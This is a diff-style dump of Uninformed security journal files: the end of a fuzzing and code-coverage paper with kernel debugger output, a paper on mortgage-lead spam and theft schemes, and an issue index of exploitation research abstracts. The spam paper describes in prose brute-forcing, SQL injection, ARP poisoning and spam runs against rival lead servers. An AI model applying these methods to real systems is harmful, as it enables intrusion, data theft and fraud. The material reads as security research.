00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4]
|
||||
004071ae T:00000001 [bp] f7a28169 6a04 push 4
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
|
||||
eip=804e3b25 esp=f3cbe720 ebp=f3cbe768 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
kd> k
|
||||
ChildEBP RetAddr
|
||||
f3c1971c 805328e7 nt!RtlpBreakWithStatusInstruction
|
||||
f3c19768 805333be nt!KiBugCheckDebugBreak+0x19
|
||||
f3c19b48 805339ae nt!KeBugCheck2+0x574
|
||||
f3c19b68 805246fb nt!KeBugCheckEx+0x1b
|
||||
f3c19bb4 804e1ff1 nt!MmAccessFault+0x6f5
|
||||
f3c19bb4 804da1ee nt!KiTrap0E+0xcc
|
||||
*** ERROR: Module load completed but symbols could not be loaded for pluto.sys
|
||||
f3c19c48 f79f0173 nt!memmove+0x72
|
||||
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||
f3c19c84 8057a510 pluto+0x1173
|
||||
f3c19d38 804df06b nt!NtWriteFile+0x602
|
||||
f3c19d38 7c90eb94 nt!KiFastCallEntry+0xf8
|
||||
0006fec0 7c90e9ff ntdll!KiFastSystemCallRet
|
||||
0006fec4 7c81100e ntdll!ZwWriteFile+0xc
|
||||
0006ff24 01001276 kernel32!WriteFile+0xf7
|
||||
0006ff44 010013a7 betterfuzz_c!main+0xa4
|
||||
0006ffc0 7c816d4f betterfuzz_c!mainCRTStartup+0x12f
|
||||
0006fff0 00000000 kernel32!BaseProcessStart+0x23
|
||||
|
||||
current context:
|
||||
|
||||
eax=00000003 ebx=00000000 ecx=8050589d edx=0000006a esi=00000000 edi=f1499052
|
||||
eip=804e3b25 esp=f3c19720 ebp=f3c19768 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000246
|
||||
nt!RtlpBreakWithStatusInstruction:
|
||||
804e3b25 cc int 3
|
||||
|
||||
commands:
|
||||
|
||||
[m] module list [0-9] enter recorder modes
|
||||
[x] stop recording [v] toggle verbosity
|
||||
[q] quit/close
|
||||
|
||||
kd> q
|
||||
[*] - Exiting Stalker
|
||||
q
|
||||
|
||||
C:\Uninformed>
|
||||
|
||||
Generating the .gml file allows the tester to view the new execution path. In
|
||||
this case the block at address 00011169 is executed. All subsequent blocks
|
||||
underneath it are not executed because the driver BugChecks inside of this
|
||||
newly hit block, indicating a bug of some sort. The 'k' command in kd produces the
|
||||
stack unwind information and we can see that a BugCheck was initiated for an
|
||||
Access Violation that occurs inside of pluto.sys.
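The difference between the two runs can also be checked without a graph. The sketch below is an illustration only, not one of Pedram's scripts: it takes a few of the "[bp]" lines from the two kd sessions above, converts each hit address to a module-relative offset using the load address printed on the "Modload:" line, and lists the offsets that only the second run reached. The image base of 0x10000 is an assumption inferred from IDA addresses such as 00011169.

```python
def hit_offsets(log_lines, module_base):
    """Collect module-relative offsets of every '[bp]' hit in a recording."""
    offsets = set()
    for line in log_lines:
        fields = line.split()
        # Assumed layout: <field0> T:<thread> [bp] <address> <bytes> <disasm...>
        if len(fields) >= 4 and fields[2] == "[bp]":
            offsets.add(int(fields[3], 16) - module_base)
    return offsets


# A few hits copied from the two kd sessions shown in this section.
run1 = [
    "003593e1 T:00000001 [bp] f7a80122 6a10 push 10h",
    "0035945e T:00000001 [bp] f7a80133 85c0 test eax,eax",
    "003594eb T:00000001 [bp] f7a80147 ff7604 push dword ptr [esi+4]",
    "00359587 T:00000001 [bp] f7a80176 8bcf mov ecx,edi",
]
run2 = [
    "00406ff8 T:00000001 [bp] f7a28122 6a10 push 10h",
    "00407075 T:00000001 [bp] f7a28133 85c0 test eax,eax",
    "00407102 T:00000001 [bp] f7a28147 ff7604 push dword ptr [esi+4]",
    "004071ae T:00000001 [bp] f7a28169 6a04 push 4",
]

# Load addresses come from the "Modload:" line of each session.
first = hit_offsets(run1, 0xF7A7F000)
second = hit_offsets(run2, 0xF7A27000)

IDA_BASE = 0x10000  # assumed image base, inferred from addresses like 00011169
newly_hit = sorted(IDA_BASE + off for off in second - first)
print([f"{addr:08x}" for addr in newly_hit])  # prints ['00011169']
```

Rebasing is needed because the driver was loaded at a different address in each session, so the raw hit addresses cannot be compared directly.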
|
||||
|
||||
|
||||
5.6) Part III
|
||||
|
||||
Analysis of the graph BadFuzz.gml generated in Part I indicated that the
|
||||
testing methods used were not effective enough to exhibit optimal code coverage
|
||||
of the device driver in question. Part II implemented an improved test case
|
||||
based on the coverage analysis used in Part I. Graph BetterFuzz.gml allowed
|
||||
testers to view the improved testing methods to ensure that the missed
|
||||
block was reached. This process revealed a fault in block 00011169 which would
|
||||
have otherwise remained undetected without code coverage analysis.
|
||||
|
||||
|
||||
6) Conclusion and Future Work
|
||||
|
||||
This paper illustrated an improved testing technique by taking advantage of
|
||||
code coverage methods using basic graph theory. The author would like to
|
||||
reiterate that the driver and fuzz tool used in this paper were simple examples
|
||||
to illustrate the effectiveness of code coverage practices.
|
||||
|
||||
Finally, more research and experimentation are needed to fully implement these
|
||||
theorems. The question remains of how to integrate a full code coverage
|
||||
analysis tool and a fuzzing tool. Much work has been done on code coverage
|
||||
techniques and their implementations. For example, the paper
Cryptographic Verification of Test Coverage Claims by Devanbu et al. presents
protocols for coverage testing, such as verifying coverage with and
without source code or with just the binary, using both block and
branch testing. A tool to automate the union of code coverage
|
||||
and fuzz technologies needs to be implemented so that the two technologies may
|
||||
work together without manual investigation. Further research may include more
|
||||
sophisticated coverage techniques using graph theory such as super blocks,
|
||||
denominators, and applying weights to frequently used loops, paths and edges.
|
||||
CFGs may also benefit from Bayesian networks, which are directed acyclic graphs
whose nodes represent variables, each with a probability distribution
conditioned on the values of its parents. In other words, the Bayesian theory
|
||||
may be helpful for deterministic prediction of code execution which can in turn
|
||||
lead to more intelligent fuzzing. In closing, the author extends the hope that
|
||||
methods and methodologies shared herein can offer other ideas to researchers.
|
||||
|
||||
|
||||
A. References
|
||||
|
||||
Devanbu, T (2000). Cryptographic Verification of Test
|
||||
Coverage Claims. IEEE. 2, 178-192.
|
418
uninformed/5.4.txt
Normal file
|
@ -0,0 +1,418 @@
|
|||
Wars Within
|
||||
9/2006
|
||||
Orlando Padilla
|
||||
xbud@g0thead.com
|
||||
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: In this paper I will uncover the information exchange of what
|
||||
may be classified as one of the highest money making schemes coordinated
|
||||
by 'organized crime'. I will elaborate on information gathered from a
|
||||
third party individual directly involved in all aspects of the scheme at
|
||||
play. I will provide a detailed explanation of this market's origin,
|
||||
followed by a brief description of some of the actions strategically
|
||||
performed by these individuals in order to ensure their success.
|
||||
Finally, I will elaborate on real world examples of how a single person
|
||||
can be labeled a spammer, malware author, cracker, and an entrepreneur
|
||||
gone thief. For the purposes of avoiding any legal matters, and
|
||||
unwanted media, I will refrain from mentioning the names of any
|
||||
individuals and corporations who are involved in the schemes described
|
||||
in this paper.
|
||||
|
||||
Disclaimer: This document is written with an educational interest and I
|
||||
cannot be held liable for any outcome of the information released.
|
||||
|
||||
Thanks: vax, Shannon and Katelynn
|
||||
|
||||
|
||||
2) Introduction
|
||||
|
||||
It is inherently obvious to anyone who owns a computer that the Internet
|
||||
has changed the world around us in a significant number of ways. From
|
||||
an uncountable number of careers to a world-wide open market, it
|
||||
drastically affected everything around us. Don't worry though, I will
|
||||
not bore you with another ``The future will look like this ... ''
|
||||
article. For that, I will refer you to a great book by Michio Kaku
|
||||
called Visions that is remarkably accurate considering it was written in
|
||||
the mid 90's. But anyway, why am I restating the obvious? To allow
|
||||
myself to focus on one not so obvious division of an existing market
|
||||
developed by a corporation that had previously filed for bankruptcy. I
|
||||
will elaborate on how it "innovated" one particular market and how that
|
||||
change resulted in a ripple of disaster and greed. The market is real
|
||||
estate and my focus is on mortgage leads.
|
||||
|
||||
The idea of finding, selling and stealing leads is anything but new; in
|
||||
fact Hollywood made a movie based entirely on the importance of sales
|
||||
leads titled 'Boiler Room' starring Giovanni Ribisi, Ben Affleck and Vin
|
||||
Diesel. The movie illustrates a perfect example of the significance of
|
||||
even one major lead.
|
||||
|
||||
I will begin by explaining what mortgage leads are, why they are worth
|
||||
writing a paper about and how certain individuals have made millions off
|
||||
of them. I will then discuss the roles of the connected individuals and
|
||||
how they continue to work when trust is the single point of failure. My
|
||||
decision to write this article is nothing more than informational; I
|
||||
have no intentions of ruining the lives of the people who make a living
|
||||
from what I am about to discuss. In fact, it is to my knowledge not
|
||||
much of a secret at all but I found it fascinating and wish to share my
|
||||
experiences with anyone willing to listen.
|
||||
|
||||
|
||||
3) Guidance
|
||||
|
||||
As I was growing up, my parents discouraged me from working while
|
||||
attending school. They made a genuine attempt to provide for me the
|
||||
support that I needed so that I could focus exclusively on my academics.
|
||||
Their reasoning for this was simple - Once you start making money,
|
||||
you'll forget what is important in life and will simply want to follow
|
||||
this path. As you read through this paper, ask yourself how true this
|
||||
actually is.
|
||||
|
||||
|
||||
Financial gain drives every market around the world, and quite honestly
|
||||
there are very few things the world as a whole has not yet done for
|
||||
money. To illustrate what my parents believe, I will describe how the
|
||||
lives of the people involved vary from the lives they once lived, and
|
||||
from the life of a person working a nine-to-five job.
|
||||
|
||||
|
||||
4) The Entity
|
||||
|
||||
Mortgage leads, referred to as leads from this point on, are nothing
|
||||
more than a selective set of criteria consisting of the following:
|
||||
|
||||
|
||||
First Name
|
||||
Last Name
|
||||
Phone
|
||||
City
|
||||
State
|
||||
Zip
|
||||
Email
|
||||
Loan Type
|
||||
Loan Amount
|
||||
Affiliate ID
|
||||
Domain Ref.
|
||||
Date
|
||||
|
||||
|
||||
Each lead must contain at least the above criteria with the exception of
|
||||
perhaps Affiliate ID and Domain Reference to be worth anything to a
|
||||
buyer. Furthermore, the more reliable a set of leads is, the more it is
|
||||
worth to a buyer. A buyer, you ask? Well, financing firms are
|
||||
indirectly involved in this scheme; finance firms take the information
|
||||
you sold to them, and follow up with the people allegedly interested in
|
||||
buying, refinancing or applying for a home loan.
|
||||
|
||||
|
||||
4.1) Background
|
||||
|
||||
To fully understand who is selling the collected information and to
|
||||
elaborate on who is buying the information listed above, I'll introduce
|
||||
hypothetical Corporation A to play the role of the real company. Corp.
|
||||
A is a mortgage firm on the decline; not only are they on the verge of
|
||||
closing shop but they have already filed for Chapter 11 bankruptcy and
|
||||
are out of viable options for recovery. As a last resort they decide to
|
||||
offer money in exchange for possible loan application candidate leads.
|
||||
This quickly gained momentum as the Internet was a prime place for
|
||||
accumulating such information. The plan eventually imploded, but before
|
||||
diving into what the outcome was, I'll elaborate on how this truly
|
||||
became its own market.
|
||||
|
||||
|
||||
4.2) Numbers
|
||||
|
||||
Initially each collector averaged about 200 leads per sale which drove
|
||||
just enough profits to keep the company afloat. The term collector, used
loosely in this paper, refers to an individual who
collects mortgage leads for the purpose of attaining a profit. A lead
was first bought at a flat rate of 10 US dollars, so at an average of
200 leads per sale the collector earned a comfortable 2,000 US
dollars. On the flip side of things, Corp. A was successfully
|
||||
conducting business averaging about 10 sales for every 100 leads they
|
||||
bought. With these numbers consistently coming through Corp. A made a
|
||||
profit of about 10,000 US dollars for every successful sale. A little
|
||||
math illustrates the return on investment ratio:
|
||||
|
||||
|
||||
Investment: 200 x 10 = 2000
|
||||
Average Profit: 10,000 x 20 = 200,000
|
||||
Return on Investment: 200,000 - 2,000 = 198,000
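The same arithmetic can be spelled out step by step. The sketch below only restates the figures given above; the variable names are mine, and the final ratio is an extra derived from those same figures.

```python
LEADS_PER_PURCHASE = 200    # leads in an average purchase from a collector
PRICE_PER_LEAD = 10         # US dollars paid per lead
LOANS_PER_100_LEADS = 10    # about 10 successful sales per 100 leads
PROFIT_PER_LOAN = 10_000    # US dollars earned per successful sale

investment = LEADS_PER_PURCHASE * PRICE_PER_LEAD
closed_loans = LEADS_PER_PURCHASE * LOANS_PER_100_LEADS // 100
gross_profit = closed_loans * PROFIT_PER_LOAN
net_return = gross_profit - investment

print(investment, closed_loans, gross_profit, net_return)
# prints: 2000 20 200000 198000
print(f"{net_return // investment}x the amount invested")
# prints: 99x the amount invested
```

The 20 in the "Average Profit" line above is the number of successful sales expected from 200 leads at a rate of 10 per 100.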
|
||||
|
||||
|
||||
Based on the collection of an insignificant amount of information,
|
||||
collectors aggressively innovated their collection methods. I will
|
||||
elaborate on what I mean shortly. For now, I will focus on what happened
|
||||
immediately after.
|
||||
|
||||
New collection methods drove the lead delivery out of control and soon
|
||||
Corp. A was inundated with so many leads that they had to start turning
|
||||
them down until they figured out how to process the volume. In order to
|
||||
handle the number of leads they were now attaining, they decided to
|
||||
partner with smaller companies and sell them the overflow. Corp. A was
|
||||
now growing exponentially fast, and in a period of roughly five to six
|
||||
years, this simple idea drove Corp. A from bankruptcy to a multi-billion
|
||||
dollar corporation. It is actually rumored that at one point in time
|
||||
this company consumed 100 of the mortgage leads ever processed in the
|
||||
United States.
|
||||
|
||||
People and greed do not mix very well, and as I mentioned earlier,
collectors and partners wanted more money, so soon other companies began
|
||||
buying leads from collectors too. I argue that at the time the mortgage
|
||||
industry was large enough for everyone to profit nicely from it; however,
|
||||
greedy collectors began selling bogus or non-exclusive leads. This
|
||||
forced mortgage firms to develop a loose classification model for
|
||||
grading the quality of a lead as an addition to the classification of
|
||||
the leads themselves.
|
||||
|
||||
- Exclusive
|
||||
|
||||
An exclusive lead is one that is sold only to one mortgage firm and never again
|
||||
redistributed. The value of these leads was often higher than non-exclusive, or
|
||||
as they decided to term them, semi-exclusive leads.
|
||||
|
||||
- Semi-Exclusive
|
||||
|
||||
Yes, semi-exclusive. I honestly cannot define this, as this is an
oxymoron in itself, but someone somewhere decided to call
non-exclusive leads semi-exclusive to allow them to be resold. (An
individual who wishes to stay anonymous informed me of the terms
commonly used.) It's a nice euphemism, though.
|
||||
|
||||
|
||||
Grade | Description
|
||||
--------+-------------
|
||||
Green | Confirmed Valid Lead
|
||||
Yellow | Characteristics of a bad lead but enough good to buy
|
||||
Red | Confirmed Invalid Lead
|
||||
|
||||
The reliability of a bulk set is assessed by the person buying them at
|
||||
the time of sale. The person interested in buying the leads takes a
|
||||
random set from the bulk he is receiving and personally verifies their
|
||||
validity. A rating is then given depending on the number of missed
|
||||
leads he finds. The grading is different with every person you deal
|
||||
with, but in short a lead is only Green if validated. A validated lead
|
||||
is one that is confirmed with the person whose information was sold
to begin with (the loan application candidate). A yellow
lead is a lead with all information accurate but the candidate was
either not home or for some reason was not available. Last, a red lead
is a confirmed invalid or bogus lead. A number of things can give away
a bad lead: for example, a Zip code and State that do not match, or a
name given as John Doe with an address on Elm Street, are probably
indications of a bad lead.
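From the buyer's side, the grading rules above could be sketched roughly as follows. This is an illustration under several assumptions: the `Lead` class carries only a subset of the fields listed earlier, the Zip prefix table is a tiny stand-in for real postal data, the John Doe check is simplified to the name alone, and `reached_candidate` stands for the buyer's manual confirmation call. As noted above, real grading differs with every buyer.

```python
from dataclasses import dataclass
from enum import Enum


class Grade(Enum):
    GREEN = "confirmed valid"
    YELLOW = "accurate but candidate not reached"
    RED = "confirmed invalid"


@dataclass
class Lead:
    first_name: str
    last_name: str
    state: str
    zip_code: str
    reached_candidate: bool  # did the buyer confirm with the candidate?


# Tiny illustrative Zip-prefix table; a real check would need full data.
ZIP_PREFIX_STATE = {"787": "TX", "100": "NY", "941": "CA"}


def grade(lead: Lead) -> Grade:
    """Apply the give-aways described above, then the confirmation rule."""
    expected_state = ZIP_PREFIX_STATE.get(lead.zip_code[:3])
    if expected_state is not None and expected_state != lead.state:
        return Grade.RED  # Zip code and State do not match
    if (lead.first_name, lead.last_name) == ("John", "Doe"):
        return Grade.RED  # obvious placeholder name
    return Grade.GREEN if lead.reached_candidate else Grade.YELLOW


print(grade(Lead("Ann", "Lee", "TX", "78701", True)).name)   # prints GREEN
print(grade(Lead("Ann", "Lee", "NY", "78701", True)).name)   # prints RED
print(grade(Lead("Ann", "Lee", "CA", "94103", False)).name)  # prints YELLOW
```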
|
||||
|
||||
|
||||
5) The War
|
||||
|
||||
Now that I have indulged you with the whereabouts and importance of a
|
||||
lead, I will discuss how they are obtained. I mentioned above how far an
individual would go as a result of greed. Below I describe their
actions, which outline their (at times) unethical behavior and
|
||||
persistence to attain more of the goods.
|
||||
|
||||
|
||||
5.1) Self Indulgence
|
||||
|
||||
When the collector decides to go a straight route (in terms of their
|
||||
industry), they can invest some time and money into setting up an
|
||||
infrastructure to lure potential clients to their web site. They first
|
||||
need to build a site that resembles a loan agency that allows visitors
|
||||
to send their applications to them. Once the collector has a website
|
||||
saving information to a database, he now hires mailers or spammers to
|
||||
advertise his website. The average return on spam has been extremely
|
||||
dynamic, and with more advanced filtering mechanisms in place, all a
|
||||
spammer can hope for is more effective evasion methods. The leads
|
||||
collected through this method are, on average, valued between eight and
|
||||
twelve US dollars per lead only because they are exclusive opt-ins (i.e.
no one else should have this information, as it was obtained directly
from the client). An opt-in is a user who wishes to receive information
regarding the service or product you provide. There have been
instances when leads are scarce, however, and opt-ins sold for over
twenty US dollars a lead. Semi-exclusive (or non-exclusive) leads on
|
||||
the other hand are usually half or less than the price of an exclusive
|
||||
lead.
|
||||
|
||||
The second method of collection is not as trivial as the first one
|
||||
sounds, although the first is a bit more involved than I actually
|
||||
described. I will elaborate further on what it takes to successfully
|
||||
build the infrastructure described above shortly.
|
||||
|
||||
|
||||
5.2) Thievery
|
||||
|
||||
Thievery obviously refers to stealing, and to steal, the collector has
|
||||
to choose from an abundance of targets. Essentially, anyone
|
||||
constructing an environment to collect leads themselves is a possible
|
||||
target. Things fall into place fairly easily for a collector wanting to
|
||||
find more targets -- recall how collectors use mailers as resources to
|
||||
advertise their websites? This is a pretty viable method for collection;
|
||||
however, alternative methods do exist and collectors use any and all
|
||||
possible enumeration methods they can think of. First, let's dive into
|
||||
the details of what collectors looking to construct websites need to do
|
||||
before hiring mailers since this is directly related to the enumeration
|
||||
of targets.
|
||||
|
||||
|
||||
5.3) Setting up an Infrastructure
|
||||
|
||||
So far all this seems pretty straightforward: they set up a webserver to
|
||||
collect information about the people interested in mortgage loans and
|
||||
the mailers responsible for advertising get a sales commission for leads
collected by their spam run. (Spam is unsolicited e-mail, often of a
commercial nature, sent indiscriminately to multiple mailing lists,
individuals, or newsgroups; junk e-mail.) To complete the cycle, the people
|
||||
interested in loans receive an email which sparks their interest and
|
||||
they navigate to the link found in the email. Collectors are usually
|
||||
ambitious and make an eager attempt at keeping their domains, websites,
|
||||
and mailers going round the clock. In the United States it is illegal
to spam a person without their consent, and spam-advertised websites
(the loan forms) hosted on a webserver in the US are not too
common, but they do exist. The easiest thing for a collector to do is to
|
||||
find a hosting provider in a communist country with no regard for the
|
||||
content placed on their servers. The technical term for this type of
|
||||
service is bullet-proof-hosting. A bullet-proof-host is a node on a
|
||||
provider's network with extremely loose Terms of Service, often allowing
|
||||
them to spam or host any content they wish. Usually the provider resides
|
||||
in a third world or communist country. The average price for such a
|
||||
service is about 2,500 US dollars a month. An alternative to dishing out
|
||||
large amounts of cash for hosting services is using a bot network: a
distributed collection of agents (bots) connected and controlled by a
central authority. Usually, though, bot networks are pretty dynamic and
|
||||
don't fit the necessary requirements to host this type of content. If a
|
||||
collector pays a mailer to spam his site for two or three days and the
|
||||
host goes down the first night (because of an unreliable bot host), a lot
is lost, so experienced folks generally tend to pay for reliable
|
||||
hosting.
|
||||
|
||||
Often, the businesses providing the bullet-proof-hosting servers are
|
||||
relatively well known, and if they are known so is their allotted IP
|
||||
space. This, in turn, makes finding servers hosting mortgage
|
||||
applications a piece of cake. All one has to do is scan a known IP
|
||||
segment for specific criteria and keep track of those that fit the
|
||||
profile. Once a worthy target list has been collected, the attacks
|
||||
follow. An interesting fact about the individuals involved in this
|
||||
industry is that nothing either one is doing is really all that legal.
|
||||
This, in fact, allows an attacker to launch whatever type of attack he
|
||||
wants on the victim machine with little to no worry about legal
|
||||
repercussions. Often a collection machine will have several required
|
||||
services open to the Internet, for example: http, ssh, ftp, mysql or
|
||||
mssql and sometimes an administrative web interface. The scope of an
|
||||
attack is unlimited and the number of man hours invested directly
|
||||
reflects on the amount of traffic the victim website attracts. It is
|
||||
even pretty common for certain prowlers to lease a server from the same
|
||||
segment the victim machine is on simply to increase their odds of
|
||||
breaching the host. The following shortly describes common attack
|
||||
practices launched against victim websites.
|
||||
|
||||
- Brute-force Enumeration
|
||||
|
||||
An attacker will attempt to guess login and password pairs on any, if
|
||||
not all of these services. Usually this kind of attack is not too
|
||||
stealthy, but remember there is little worry - I mean the victim
|
||||
cannot simply pick up the phone and call his lawyer can he?
|
||||
|
||||
- SQL Injection
|
||||
|
||||
If any of the web interfaces are accessible through the site, sql
|
||||
injection attacks are another vector for entry. Although the success
|
||||
ratio of sql injection is now relatively low, there are still some
|
||||
low hanging fruit to find and be assured someone greedy and
|
||||
ambitious enough will find it.
|
||||
|
||||
- Classic Attacks
|
||||
|
||||
With the massively large number of exploits developed and released to
|
||||
the public daily, searching and launching attacks is a frequent action.
|
||||
This sometimes opens up a new market for exploit writers looking to
|
||||
make some quick cash. Collectors can advertise the need for an exploit
|
||||
and place a price on a particular application. There are even online
|
||||
auctions that have been built specifically for this purpose.
|
||||
|
||||
- Passive / Passive Aggressive
|
||||
|
||||
When an attacker decides to lease a machine on the same segment, it
|
||||
is usually because they failed to remotely compromise the victim's
|
||||
machine. As a last resort they can do several things to retrieve
|
||||
the information they are looking for. The attacker can launch an
|
||||
ARP Poisoning attack and sniff all the incoming traffic to the
|
||||
victim machines, an attacker can simply redirect all the client
|
||||
requests to himself and collect the leads himself, or even hope for
|
||||
the victim himself to log on and perform a man-in-the-middle attack to
|
||||
passively collect credentials.
|
||||
|
||||
|
||||
6) More on The Money
|
||||
|
||||
In this section, I will associate the roles described above with the
|
||||
amount of money they can generate. As described earlier, the mailer
|
||||
serves as the core distributor of an advertising campaign. As a company
|
||||
would pay a marketing company for it to advertise its products, a
|
||||
collector pays a mailer to generate leads (i.e., advertise and generate
|
||||
revenue). He can also simply take matters into his or her own hands and
|
||||
do the dirty work himself. If a mailer is hired however, to properly
|
||||
track what a mailer collects there is a nifty procedure in place. Each
|
||||
mailer is given a unique ID number and the link spammed in each email
|
||||
contains the ID number. When a client submits information regarding his
|
||||
loan inquiry, the mailer's ID number is included and the collector now
|
||||
has record of how many leads a mailer is generating. This method of
|
||||
tracking referrals is well adopted in most spam/advertising related
|
||||
industries online. The majority of spyware and adware vendors leverage
|
||||
this method of tracking to pay their affiliates.
|
||||
|
||||
A single spam run can be as large as two million emails. The time
|
||||
needed to complete a run that big depends on a few key factors - the
|
||||
method used for distribution and the spam software being used. If a
|
||||
decent sized list of proxies is used you can send an average of about
|
||||
forty thousand emails per half hour using Dark Mailer. With a little
|
||||
math we can compute that transmitting two million emails would take
|
||||
about twenty-five hours. Moreover, if I were to shoot low and say that
|
||||
.01 percent of two million emails from a single spam run actually
|
||||
worked, the return for the collector on exclusive leads is about 200
|
||||
leads per mailer, which at 10 dollars a lead comes to about 2,000 USD. The
|
||||
mailers receive on average about 8 dollars per referral and can usually track
|
||||
their statistics through a web-based front end tracking their return on
|
||||
time investment in real-time.
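
The arithmetic above can be checked with a short sketch. The function
names are illustrative only and do not come from any tool mentioned in
this paper; the inputs are simply the figures quoted in the text (two
million emails, forty thousand per half hour, a .01 percent response
rate, and 10 dollars per lead).

```c
#include <assert.h>

/* Minutes needed to send `emails` messages at `per_half_hour` messages
 * every thirty minutes (integer arithmetic, rounded down). */
unsigned long long run_minutes(unsigned long long emails,
                               unsigned long long per_half_hour)
{
    assert(per_half_hour != 0);
    return emails * 30ULL / per_half_hour;
}

/* Leads produced when `per_ten_thousand` out of every 10,000 recipients
 * respond; .01 percent is 1 per 10,000. */
unsigned long long leads_from_run(unsigned long long emails,
                                  unsigned long long per_ten_thousand)
{
    return emails * per_ten_thousand / 10000ULL;
}

/* Collector revenue for a number of leads at a fixed price per lead. */
unsigned long long lead_revenue(unsigned long long leads,
                                unsigned long long dollars_per_lead)
{
    return leads * dollars_per_lead;
}
```

With the figures from the text, run_minutes(2000000, 40000) gives 1500
minutes (twenty-five hours), leads_from_run(2000000, 1) gives 200, and
lead_revenue(200, 10) gives 2000.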
|
||||
|
||||
|
||||
7) The Disaster
|
||||
|
||||
So far, I've covered in fairly good detail the structure of what was
|
||||
once a falling corporation taking a 180 degree turn and rising straight
|
||||
back up to the top. It is too well known though, that what goes up must
|
||||
come down and twice as fast as it went up.
|
||||
|
||||
The core of the problems started out when mailers began to falsify the
|
||||
content of the spam for their collectors. Mailers noticed that the
|
||||
lower the rate they advertised the more traffic they would drive to the
|
||||
collector's website. More traffic indicated a higher collection of
|
||||
leads which resulted in more money. Whether the mailers were aware of
|
||||
the laws before they did what they did is unknown to me but their lies
|
||||
resulted in lawsuits unfolding from all sides. Unhappy individuals
|
||||
who had been promised a 1.9 - 2.5 percent interest rate on a loan began filing
|
||||
lawsuits against the collectors. This resulted in a fairly large
|
||||
chain of angry partners. The hierarchy below indicates the ripple of
|
||||
disaster that came about.
|
||||
|
||||
|
||||
8) Conclusion
|
||||
|
||||
It is fair to say that ambition can get the best out of people. Indeed,
|
||||
I'm sure these individuals are trying their best to make a profit out of
|
||||
this endeavor. Unfortunately, it is not the most appropriate way to
|
||||
make a living; it does however show that their perception is a bit
|
||||
different. Most of them feel that by staying away from selling drugs
|
||||
and pornography online, they are not hurting anyone and simply taking
|
||||
advantage of a good way to make some money. In retrospect, I agree, but
|
||||
I refuse to condone spam for any reason; it consumes countless corporate
|
||||
man hours and is a general nuisance to anyone who receives email.
|
||||
|
||||
|
||||
A. References
|
||||
|
||||
Spammer-X, ``Inside the spam cartel.'' http://www.oreilly.com/catalog/1932266860/.
|
||||
Boiler Room, http://www.imdb.com/title/tt0181984/.
|
||||
|
||||
|
||||
|
||||
|
BIN
uninformed/5.5.pdf
Normal file
Binary file not shown.
29
uninformed/5.txt
Normal file
|
@ -0,0 +1,29 @@
|
|||
Exploitation Technology
|
||||
Implementing a Custom X86 Encoder
|
||||
skape
|
||||
This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe.
|
||||
txt | html | pdf
|
||||
|
||||
Preventing the Exploitation of SEH Overwrites
|
||||
skape
|
||||
This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations.
|
||||
txt | html | pdf
|
||||
|
||||
Fuzzing
|
||||
Effective Bug Discovery
|
||||
vf
|
||||
Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations. Code coverage analysis implemented in conjunction with fuzz testing reveals faults within a binary file that would have otherwise remained undiscovered by either method alone. This paper suggests a research method for more effective runtime binary analysis using the aforementioned strategy. This study presents empirical evidence that despite the fact that bug detection will become increasingly difficult in the future, analysis techniques have an opportunity to evolve intelligently.
|
||||
code.tgz | txt | html | pdf
|
||||
|
||||
General Research
|
||||
Wars Within
|
||||
Orlando Padilla
|
||||
In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play. I will provide a detailed explanation of this market's origin, followed by a brief description of some of the actions strategically performed by these individuals in order to ensure their success. Finally, I will elaborate on real world examples of how a single person can be labeled a spammer, malware author, cracker, and an entrepreneur gone thief. For the purposes of avoiding any legal matters, and unwanted media, I will refrain from mentioning the names of any individuals and corporations who are involved in the schemes described in this paper.
|
||||
txt | html | pdf
|
||||
|
||||
Wireless Technology
|
||||
Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field
|
||||
Johnny Cache
|
||||
The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using. The technique outlined is entirely passive, and given the number of features that are being considered for inclusion into the 802.11 standard, it seems quite likely that it will increase in precision as the standard marches forward. The implications of this are far-ranging. On one hand, the techniques can be used to implement innovative new features in Wireless Intrusion Detection Systems (WIDS). On the other, they can be used to target link layer device driver attacks with much higher precision.
|
||||
code.ref | html | pdf
|
||||
|
2606
uninformed/6.1.txt
Normal file
File diff suppressed because it is too large
Load diff
895
uninformed/6.2.txt
Normal file
|
@ -0,0 +1,895 @@
|
|||
Locreate: An Anagram for Relocate
|
||||
skape
|
||||
12/2006
|
||||
mmiller@hick.org
|
||||
|
||||
1) Foreword
|
||||
|
||||
Abstract: This paper presents a proof of concept executable packer
|
||||
